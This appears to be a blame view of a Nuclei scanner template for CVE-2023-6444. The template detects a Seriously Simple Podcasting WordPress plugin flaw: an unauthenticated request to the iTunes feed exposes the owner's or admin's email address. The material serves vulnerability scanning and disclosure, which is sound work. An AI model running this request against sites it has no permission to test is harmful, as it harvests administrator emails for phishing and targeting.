nuclei-templates/http/cves/2023/CVE-2023-6444.yaml

58 lines
1.9 KiB
YAML
Raw Normal View History

2024-08-07 14:46:06 +00:00
id: CVE-2023-6444
info:
2024-08-16 21:31:10 +00:00
name: Seriously Simple Podcasting < 3.0.0 - Information Disclosure
2024-08-07 14:46:06 +00:00
author: s4eio
severity: medium
description: |
The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.
remediation: Fixed in 3.0.0
reference:
- https://wpscan.com/vulnerability/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa/
- https://github.com/Wayne-Ker/CVE-2023-6444-POC/blob/main/cve-2023-6444.py
2024-08-16 21:31:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-6444
2024-08-07 14:46:06 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-6444
epss-score: 0.00043
epss-percentile: 0.09401
cpe: cpe:2.3:a:seriously_simple_podcasting_plugin:seriously_simple_podcasting_plugin:2:*:*:*:*:*:*:*
metadata:
verified: true
2024-08-16 21:31:10 +00:00
max-request: 2
2024-08-07 14:46:06 +00:00
vendor: castos
product: seriously-simple-podcasting
framework: wordpress
publicwww-query: "/wp-content/plugins/seriously-simple-podcasting/"
2024-08-16 21:31:10 +00:00
tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting
2024-08-07 14:46:06 +00:00
flow: http(1) && http(2)
http:
- raw:
- |
2024-08-16 21:31:10 +00:00
GET / HTTP/1.1
2024-08-07 14:46:06 +00:00
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
2024-08-16 21:31:10 +00:00
- 'contains(body,"/wp-content/plugins/seriously-simple-podcasting")'
2024-08-07 14:46:06 +00:00
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /?feed=itunes HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"<itunes:email>","</itunes:email>")'
- 'contains(content_type,"text/xml")'
- 'status_code == 200'
condition: and
2024-08-16 21:45:30 +00:00
# digest: 4a0a0047304502200380a0c927310d60e03b4b1bcd246322799960ef1ec12c486aa5c8cf242d067f022100efd0d045c5e788bc8f9ff16b5bbda9da1a759bede6d5b4709bdfb439bc12dd6f:922c64590222798bb761d5b6d8e72950